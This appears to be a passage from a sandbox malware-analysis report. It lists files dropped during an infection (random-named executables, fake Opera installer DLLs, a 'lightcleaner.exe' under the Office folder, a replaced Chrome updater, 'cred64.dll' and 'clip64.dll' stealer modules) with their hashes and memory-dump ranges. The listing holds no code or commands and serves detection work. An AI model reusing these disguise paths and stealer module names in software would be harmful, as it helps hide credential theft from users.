MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

memory/1304-70-0x0000000005B20000-0x0000000005B6C000-memory.dmp

C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe

MD5 ffb1cc96c04308e8cf27d8c8251ee01a
SHA1 2b33aa254e10f473040b8d65b53862b2bea289c4
SHA256 a8dc0238b6272da428b85bba473b20ff20346d759204b8c689b1a8af3a24a9be
SHA512 fb0df2d1c3ba98b8ff681c00a22debfc2445f39d7acd6c532681f7ef2c21d8bdc7f30306d3486182f95697d671fae601c5eb4561056d930f851d4b69c816abc0

C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe

MD5 d88f367b41afa18635f0bfb34183116d
SHA1 9c5ed052125574db17b29db79e1288a2fb4cf645
SHA256 d8795171f1813169491e289f5997f267081a9df66145301f4c75b3d0c01dce3f
SHA512 8187c5f350eb23727544ed9f25f56dcf748f0a97c54b738226e88fdc86f38808768a436b1e3950e8a9774029c0ee1ac5945697488cd9cc9ec6e8a291cb81fa4b

C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe

MD5 b68feec717f5a72bbb97c92d76ba8ae2
SHA1 2a7f758345bb7029f711cc239ab11c9d97c5ce2e
SHA256 27d70a3460277e9b288d645f3b986bb9bb5da4ef171e8b5e0f673376d0e7a6be
SHA512 128b80c8e840f2ad0b375bb4de948a0325c3f0edc8bf3056d8b748667ae8dc91d8a7aeff7d8656edffc66ac81389ffcc952124e874470be22e9e473c0f6565fe

C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/1412-169-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/3212-168-0x0000000000400000-0x000000000046A000-memory.dmp

memory/1304-179-0x0000000002230000-0x0000000002240000-memory.dmp

memory/3212-181-0x0000000000400000-0x000000000046A000-memory.dmp

memory/1412-177-0x0000000000840000-0x0000000000B5C000-memory.dmp

C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

memory/1412-184-0x00000000056E0000-0x00000000058A2000-memory.dmp

memory/1304-192-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/1704-186-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/1704-214-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/1304-224-0x0000000002230000-0x0000000002240000-memory.dmp

memory/3696-233-0x00007FF6B9FA0000-0x00007FF6BA08C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

MD5 e68b77a121897a173ae76fd5adb7a2ae
SHA1 eb78add4ff4f150e14563f1c74dbcaf7d7c75657
SHA256 a006bcbe9375b95cb3b4ee2451d0eac3e2453370aa51304fa30bc0b27bc836e8
SHA512 58c47767bfc560d4ffb2f6bd10c2f48da6b4b35f6e824cb7a985ca0775b92d3b207e5909edfd8dc5b8119d9834fd14fc80e5d7aed029712c1475b9e78f41408b

memory/4012-241-0x0000000000580000-0x0000000000ACD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310050832072402444.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/1512-242-0x0000000002120000-0x0000000002121000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe

MD5 e68b77a121897a173ae76fd5adb7a2ae
SHA1 eb78add4ff4f150e14563f1c74dbcaf7d7c75657
SHA256 a006bcbe9375b95cb3b4ee2451d0eac3e2453370aa51304fa30bc0b27bc836e8
SHA512 58c47767bfc560d4ffb2f6bd10c2f48da6b4b35f6e824cb7a985ca0775b92d3b207e5909edfd8dc5b8119d9834fd14fc80e5d7aed029712c1475b9e78f41408b

memory/2444-251-0x0000000000580000-0x0000000000ACD000-memory.dmp

memory/4528-252-0x0000000000D20000-0x0000000000D21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310050832084905020.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/3332-258-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/5020-257-0x00000000003B0000-0x00000000008FD000-memory.dmp

memory/3332-259-0x0000000005680000-0x0000000005690000-memory.dmp

memory/1304-261-0x00000000060C0000-0x00000000060F2000-memory.dmp

memory/1304-263-0x000000006F6A0000-0x000000006F6EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310050832098505100.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/1304-279-0x0000000006CD0000-0x0000000006D73000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-66CBQ.tmp\_isetup\_setup64.tmp

MD5 e4211d6d009757c078a9fac7ff4f03d4
SHA1 019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256 388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA512 17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310050832105372408.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\890696111233

MD5 38573da7689c17f3c20cf1aec8725a0a
SHA1 a6779c404545b5c1eeabd17cc4649f1aa06176b5
SHA256 77bba08fe4b80e031d0562e48951893090b8d83d9474349aaae1b5d8831df9be
SHA512 22b65b23d1a57f6f2ca447ad2495f543319b0b6f74a41f7ab2baf193f572a1688390353c7bdf21197bfb81132b221af26072ebe1e873cd78a59559e2ca7e832b

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 6a727b1d2e5a50a0748f35663cdb92c5
SHA1 cecfc6df19770474d38ddac6adbfe1e84277812d
SHA256 42515ff65f86166495f352874df53bc258d879318a83b67a00bd6a4727c19f55
SHA512 2745522724ad41e4d0a19e0dc745190fdd8b78391d1d4afb0420a0371b6194138c068e87ef190a10d41bb6e4ce6794ca14aac1a95bc447fa79f2d4989b038275

memory/2408-287-0x0000000000580000-0x0000000000ACD000-memory.dmp

memory/1304-300-0x0000000006DF0000-0x0000000006E0A000-memory.dmp

memory/1304-299-0x0000000007440000-0x0000000007ABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

memory/1412-281-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/1304-310-0x0000000005EF0000-0x0000000005EFA000-memory.dmp

memory/5100-276-0x0000000000580000-0x0000000000ACD000-memory.dmp

memory/1304-275-0x00000000060A0000-0x00000000060BE000-memory.dmp

memory/1304-262-0x000000007F110000-0x000000007F120000-memory.dmp

memory/1304-320-0x0000000007090000-0x0000000007126000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310050832060064012.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/1304-323-0x0000000007010000-0x0000000007021000-memory.dmp

memory/1304-219-0x0000000002230000-0x0000000002240000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

memory/1732-335-0x00007FF601320000-0x00007FF601863000-memory.dmp

memory/1304-336-0x0000000002230000-0x0000000002240000-memory.dmp

memory/1412-340-0x0000000006960000-0x0000000006E8C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

memory/1704-346-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/1512-347-0x0000000000400000-0x0000000000513000-memory.dmp

memory/3212-345-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 450200b96c62ebe1eeaea879ad50a0e6
SHA1 1de3ea605773fe94bff186e4c8900a8bdf14b9b9
SHA256 da8e039cefc5a0c8acb46daf53941a1c5afe2faf91b35a2df0a311e95569f842
SHA512 a72ed09ea6f7d496f2257a9b9a287aaf7ae558faa74d00bba51c10947a19ade31afdde9e103f161a6496f9795a234948c0cef854ca21e169fbef54ff1ab116e4

memory/1304-348-0x0000000007050000-0x000000000705E000-memory.dmp

memory/4528-354-0x0000000000400000-0x000000000071C000-memory.dmp

memory/1412-356-0x0000000005970000-0x0000000005980000-memory.dmp

memory/1304-358-0x0000000007060000-0x0000000007074000-memory.dmp

memory/1412-362-0x0000000005970000-0x0000000005980000-memory.dmp

memory/1412-361-0x0000000005970000-0x0000000005980000-memory.dmp

memory/1304-363-0x0000000007150000-0x000000000716A000-memory.dmp

memory/1304-366-0x0000000007130000-0x0000000007138000-memory.dmp

memory/3696-360-0x00000000038D0000-0x0000000003A01000-memory.dmp

memory/3696-357-0x0000000003750000-0x00000000038C1000-memory.dmp

memory/2408-369-0x0000000000580000-0x0000000000ACD000-memory.dmp

memory/4528-373-0x0000000000D20000-0x0000000000D21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/1732-375-0x00007FF601320000-0x00007FF601863000-memory.dmp

memory/1512-393-0x0000000000400000-0x0000000000513000-memory.dmp

memory/4528-398-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

memory/4528-405-0x0000000000400000-0x000000000071C000-memory.dmp

memory/1704-409-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 b3aafe2caebb187c917bd2298e66a61d
SHA1 b8b8c9c0e5f32c0396539ad99cf20f798bcf609c
SHA256 350b261c274eb5cae67f5499733861761c991ba186deb25a9397b32ac25f6165
SHA512 599688d83db32b54695ffb03291ffc88f8dca37d52f4b45b374de105ea01abf07642f1910a6fcc9bd61038b7c9d0df7b29b439632c7b70d115a5772d88343144

C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

C:\Users\Admin\AppData\Local\Temp\6f-e8204-190-c1f8e-2cd1775d4e82c\Xotofycidy.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\6f-e8204-190-c1f8e-2cd1775d4e82c\Xotofycidy.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

memory/4396-470-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

C:\Users\Admin\AppData\Local\Temp\is-3686R.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1512-503-0x0000000000400000-0x0000000000513000-memory.dmp

memory/3212-513-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

memory/5380-541-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4396-542-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9dd907b60f43046106437062016ffcf4
SHA1 7be52d7ddbd502e37507dd8c9cc78742f24109c3
SHA256 b1f9278445d619cbb13bc571c1b797ced6006ca6dd5076062da897e960928697
SHA512 11bf69a7d4eb40cf70ea4e2e35a9e97e9ebf7595b4d49136365b6a94bd2177453f52609bbcc4c27b06a997598313e3064e6f57b650de9b8131270f34c1e77e6e

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

memory/1732-561-0x00007FF601320000-0x00007FF601863000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe

MD5 0d88834a56d914983a2fe03d6c8c7a83
SHA1 e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35
SHA256 e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53
SHA512 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\dbgcore.dll

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\dbgcore.DLL

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

memory/6136-604-0x00007FF709800000-0x00007FF709D43000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

memory/6136-644-0x00007FF709800000-0x00007FF709D43000-memory.dmp

memory/5864-653-0x00000000010D0000-0x00000000010F0000-memory.dmp

memory/6136-654-0x00007FF709800000-0x00007FF709D43000-memory.dmp

memory/1940-659-0x00007FF7FBFB0000-0x00007FF7FBFC3000-memory.dmp

memory/5864-660-0x00007FF72C890000-0x00007FF72D0D0000-memory.dmp

memory/5864-666-0x00007FF72C890000-0x00007FF72D0D0000-memory.dmp

C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.proofing.msi.16.en-us.xml

MD5 d23cf0da0462ecbb77509f23f26edc57
SHA1 b0a3353089a1c174a092e7a791d286bb28bb764c
SHA256 9fc823530ff0f81c7064fb67d0f6932ad735897a2f5479a8f1d298075b04817f
SHA512 a113d35757e4abebede230ca695b2163f44910bdca6253ad65d3649ab1cdaa16da966f01dc1c85d782ed775757915c130e39d6aa008ff5b926674ac353d23dff

C:\ProgramData\95827229786989655457259687

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73